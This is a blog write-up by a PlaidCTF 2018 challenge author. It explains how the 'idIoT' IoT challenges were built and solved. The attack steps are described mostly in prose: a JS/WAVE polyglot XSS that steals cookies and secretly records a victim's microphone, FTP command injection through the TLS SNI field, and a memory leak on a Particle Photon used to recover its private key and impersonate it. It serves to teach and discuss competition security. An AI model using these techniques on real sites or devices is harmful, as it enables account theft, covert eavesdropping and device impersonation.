PlaidCTF 2018: I Heard You Like IoT

May 25th, 2018

For PlaidCTF a few weeks ago, I created a series of problems titled “idIoT”. In this series of challenges, players got the opportunity to attack two websites, a Google Home, an FTP server, a WiFi camera, and a Particle Photon. Participants seemed to enjoy these challenges, so I thought I’d do a little writeup on the creation of these challenges and my own solution guide, like the one Zach did for S-Exploitation last week.

Inspiration

I first had the idea to do a CTF problem using Google Assistant in the late fall of 2017. The original plan was to do a fairly standard XSS problem that required attackers to use the Web Speech API to interface with the smart speaker. However, I realized that I needed to give the attacker microphone access in order to record the Google Assistant’s response, which for privacy reasons would only make sense on a site that already had the user’s permission to use the microphone. This led to the idea to create Clipshare, the audio-sharing site used in the problem.

Much later (around February or so), it occurred to me that it might make for a more interesting problem if I made the XSS nontrivial. Inspired by some previous work I had seen in polyglot files, I poked around with some audio file formats to determine if such an attack would be possible – and to my surprise, it was even fairly straightforward (but more on that later).

The idea to do a problem with a Particle Photon and a LED strip attached to it came to me independently at around the same time as the initial Google Assistant idea. I actually had a photon set up with an LED strip nearly identically to the problem in my apartment, and one day I jokingly told it to set the pattern to -1, and laughed at the fact that I was leaking memory. After looking at the accessible information held on the Photon, I realized that one could theoretically leak the Particle’s private key, and then impersonate the Photon to post events, and decided to make this into a challenge.

The second part of the challenge, the FTP server with the Wifi camera, was created much later to tie the two parts together. The original concept was going to be to create a custom Wifi camera using a Raspberry Pi that would allow the user access via a header injection bug that would allow them to insert CORS headers and therefore make requests from the Clipshare host. However, I deemed this a little bit too expensive to pursue, so instead opted to use some cheap off-the-shelf Wifi cameras that I had access to for some unrelated work. However, every reasonable exploit on the cameras themselves would provide the attackers root, which would make it far too easy to permanently take down the challenge. Therefore, I opted to have them attack an easy-to-reset FTP server instead.

Solution

Part 1 (Action)

We’re given the Clipshare website and a user to attack. The problem description indicates that we need to gain access to that user’s clips in order to make them wait on the page for long enough to talk to the Google Home. Poking around, we find that if we add a user as a friend, then we gain the ability to share clips with them. This indicates that this is probably an XSS challenge.

Testing all of the fields in the clip creation form indicates that the description field is trivially injectible (i.e., it doesn’t even have any filters, so you can just write HTML straight into the description). However, the Content-Security-Policy is pretty strict:

Content-Security-Policy

content_copy

Content-Security-Policy: style-src 'self' https://fonts.googleapis.com; font-src 'self' https://fonts.gstatic.com; media-src 'self' blob:; script-src 'self'; object-src 'self'; frame-src 'self'

Therefore, if we want JS execution, we need to have a JS file on-site. Therefore, we probably need to upload a JS file via the audio upload feature.

However, this raises two problems. First, the audio file is validated through some unknown process (uploading a garbage file results in an “invalid audio file” error), so uploading JS directly isn’t going to work. Second, the Apache server serves audio files with appropriate audio/* MIME types, which Chrome refuses to execute.

Apache selects which MIME type to use based on the file’s extension; however, the server checks the extension of uploaded file before saving it, and therefore the file must be one of .wav, .wave , .mp3, .ogg, or .webm. Trying all of these, it turns out that Apache doesn’t recognize .wave as a WAVE audio file by default, and therefore serves it with no MIME type – allowing us to execute it as JS with a <script> tag!

This brings us back to the first issue of the server validating audio files through an unknown process; however, as it turns out, we don’t need to exploit the validator, since it’s possible to build a valid JS/WAVE polyglot by using the length field to comment out all of the headers and then embedding our payload in the audio data:

Construction of a polyglot .js/.wave file.

Therefore, we can use the following steps to get the target user’s cookie in order to see their clips:

Crate a new clip with a *.wave polyglot containing a payload that sends us the target’s cookie
Create a second clip with the description <script src='/uploads/path-to-first-audio-file.wave'></script>
Share the second clip with the target

This gives us the target’s cookie, which we can then use to impersonate the target and listen to their clips. The first clip tells us the trigger phrase for obtaining the flag – “Ok Google, what is the flag?” – and the second tells us that including the word “spatulate” in the description of our clip will make the target wait on the page for longer. Now we need to use our XSS to leak the flag:

Create a new clip with a *.wave polyglot containing a payload that records from the microphone for about 12 seconds, and then POSTs it to a server we control
Create a second clip whose audio is a recording of you saying “Ok Google, what is the flag?”, and whose description is spatulate <script src='/uploads/path-to-first-audio-file.wave'></script>
Share the second clip with the target

Note that most of the code you need to record the microphone is already available on-site through the “record a clip” feature.

If everything went well, you should get a recording in which the Google Home responds with “the flag is P… C… T… F… open brace… not… underscore… so… underscore… smart… close brace,” giving the flag PCTF{not_so_smart}.

Part 2 (Camera) – Intended solution

In Part 2, we’re given an FTP server binary running on the client’s machine on port 1212 to attack. After some reversing, we find the following:

The server is a fairly striaghtforward write-only, passive-mode-only FTP server that stores all files in a constant location.
The username and password are neither checked nor required.
There’s an extra command, IP, that changes the IP that the server uses for passive mode. You can only use it if you connect from 127.0.0.1.
The IP command has a bug that allows the command to work without a space before the argument and without a newline directly following the argument – so IP1.2.3.4xxx will set the IP to 1.2.3.4.
The server will close the connection if it receives a line starting with GET, HEAD, POST, PUT, DELETE, CONNECT, OPTIONS, TRACE, or PATCH.
The server has a bug that causes it to split commands not only on \r\n but also on null bytes.

The disallowing of pretty much every common HTTP verb prevents any sort of direct HTTP request to the server, since the very first line of the request starts with the verb. It also prevents a websocket connection, since the websocket handshake is done over an HTTP request. However, this does not prevent an HTTPS connection, since that will not start with an HTTP verb.

However, can we insert a command into an HTTPS request? Since the FTP server won’t respond with a valid handshake response, it will need to be in the handshake. Here, Orange’s great SSRF talk gives us the answer – we can use the server name indication (SNI) in the handshake to put plaintext data into HTTPS handshake! Notably, the SNI is preceded by a 16-bit big-endian length field (despite the field whose length it is measuring being at most 255), so we can use the high byte of the SNI length field to start a new command, and then use the low byte and the SNI itself to produce the IP command:

IP command injection through SNI.

Thus, if we send an HTTPS request to the above host at port 1212, the IP camera will send its images to us instead of the FTP server’s waiting passive port, giving us a picture of the inside of a box with the flag written on the side: PCTF{d0nt_b3_a_SNItch}.

Part 2 (Camera) – Unintended Solution

The FTP camera actually has one more bug that I didn’t list above: lines are automatically terminated after 8095 characters, and anything beyond that point will be interpreted as part of the next line. Therefore, we can simply redirect the browser to an ftp:// URL with a sufficiently long username; simply set it to any 8187 characters followed by IPyour.ip.goes.here; then the USER line will get cut off, and the IP string will be interpreted as its own command.

We actually found and patched out this bug during testing, but apparently I reintroduced it when I was rebuilding the final binary on one of the XSS bots.

This will also get us the flag for Part 2, but won’t work for Part 3, as we’ll see in a minute.

Part 3 (Lights)

We’re given a number of files:

An Arduino program running on a Particle Photon
A dump of the Photon’s flash, with some sections nulled out
A simple HTML dashboard
A text file with helpful notes

Looking at the HTML dashboard, it appears to be listening to Particle events for a specific device ID. Therefore, we probably need to either have the Photon post an event for us, or impersonate the device and post the event ourselves. However, if we are able to post an event, then getting the flag is pretty easy – we can insert a broken image, and then in the onerror post the entire body of the page to a server we control.

The program has no obvious bug that would give us IP control, but does have a straightforward out-of-bounds when accessing a pattern by index. Using this, we can leak any memory to which we have a pointer by setting the pattern index such that it uses the pointer as its data pointer.

Inspecting the flash dump and crossreferencing it with the Particle docs, it looks like the section that was nulled out was the device’s private key (both times it appears). Using this private key, we should be able to impersonate the device to create our own event.

Putting these ideas together, a reasonable plan of attack is to leak the device’s private key on the LEDs and use the pictures we’re getting from the IP camera via our attack in part 2 to reconstruct the key. First, this will require us to modify our attack from part 2 to give us the full 3fps stream rather than a single image; this can be done by using the intended attack and then also having the browser repeatedly send HTTP connections to http://localhost:22222 to prevent the FTP server from waiting on incoming data. This gives us about 120 images every time we connect, of which about 100 will contain actually useful data.

Now, we run into a problem: we don’t have a pointer to the private key that we can use to construct a pattern! However, our notes give us the address of where the pattern name is stored, so if we can write a name that resembles a valid pattern struct, then we can use our out-of-bounds from earlier:

content_copy

typedef struct {
  uint32_t flags;
  char* name;
  uint32_t* colors;
} pattern;

However, we run into another problem immediately, as we need to set the pattern by speaking it to the Google Home. This means we can’t insert arbitrary strings as our pattern; only things that will output from the Google Home properly! Even worse, any pointer that would put us near the appropriate parts of the private key would have to contain a byte of either 5e or 9e, the former of which is a special character (^) and the latter of which isn’t even valid ascii!

There are two ways around this. The one that I produced for the attack is to use the fact that Google will translate emoji to obtain the required bytes; for example, if you say “Ok Google, set pattern to name ‘egg emoji’”, then the pattern will be set to the string "🥚" . In particular, I constructed the pointer to the private key using the “disappointed face emoji” (😞), which is UTF-8 encoded as f0 9f 98 9e. Using this with other appropriate words, we can construct our pattern struct:

Constructing a struct through a speech-to-text string to be stored in SRAM.

Conveniently, 0000989e points to a part of the private key just before p; leaking p through this process will allow us to easily determine q, and recover d and the other components of the ASN.1-formatted key.

The other way (discovered by Robert Xiao during testing) is that Google Assistant will translate “to the power of” into a caret, providing the necessary 5e byte. Through a similar process as above, we can read memory just after 00005e20, which puts us part way through the private exponent; we can recover the rest of the exponent (and the rest of the key) using some crypto-based attacks.

Thus, we can make the LEDs leak parts of the private key using the following two commands:

“Ok Google, set LED pattern to name 'acknowledge a disappointed face emoji” (this loads our fake struct into SRAM at the address given in the “helpful notes” text file)
“Ok Google, set LED pattern to index 78250547” (this index can be computed using the known address of our string in SRAM and the start index of the patterns array that you can figure out from the flash dump)

The private key can then be recovered by manually transcribing the LED colors from the video into the appropriate 2-bit chunks, and then figuring out how they fit together to produce the leaked memory.

Using this recovered private key, we just need to impersonate the Particle to the device.spark.io server. The easiest way to do this is by reimplementing parts of the Particle’s communication library by looking at its source (note that its docs are often misleading or wrong, hence the hint in the “helpful notes” file). We can then test against a local cloud spark server until we get it right, and then run it against the real server once we have it all working. However, if we impersonate the Photon, then it will get disconnected from the cloud, and will immediately attempt to reconnect, which will cause our connection to drop before we are able to post the event; if we force the Photon to crash, however, we can post our event while it’s flashing an error code, allowing us to post our XSS payload and obtain the flag: PCTF{U+1F449_ooO00Oh_4hhh_pr3ttY_cOl0rs_U+1F448}.

Issues and Lessons Learned

While the problem was generally well-received (it was one of the most common answers to the question “what was your favorite problem” in the feedback form), it definitely wasn’t without its fair share of issues. The most obvious one from the above writeup was accidentally leaving in an unintended solution to part 2, but that was far from the largest issue.

idIoT: Action was planned to be released at the beginning of the competition. However, setting up the laptop XSS bots turned out to be a very nontrivial task, since only one of the three setups actually had Ubuntu installed (the others were loaned and had to be returned, and were thus booting from live USBs). This is also why there was only one XSS bot for a long time: it was the only laptop that didn’t require external media (which I neglected to prepare sufficiently far in advance) to start up.

The age of the laptops themselves was also an issue; we had to fully restart work on two of the bots, since faulty hardware managed to corrupt two of the live USBs. This is also why the second bot wasn’t up and stable until around 9 hours into the competition.

There were also a fair amount of issues setting up the Photon boxes, but fortunately those issues didn’t affect the competition since it was such a long time before any team reached that part of the problem. Surprisingly, there were almost no issues getting the crappy IP cameras up and running, even though I had anticipated those being quite a chore.

Perhaps the biggest issue, though, was balancing the third part of the problem. By the time any team made it to that part, it probably wasn’t very doable, since the exploit is quite involved; as far as I know, most teams opted to not put much effort into it, which was probably a wise choice. I could say that this was an unfortunate outcome from the competition being only 36 hours instead of the usual 48, but I had sufficient advance notice for that change that I should have adjusted accordingly.

Overall, I’m happy with how the problem came out, but I’m almost definitely never doing anything like this again. (I think I told Zach to slug me if I ever try to do another hardware challenge about twenty times.) Hopefully everyone had as much fun playing this challenge as I had putting it together!

If you want to see a picture of the hardware setups, I created an imgur album with pictures of all three parts.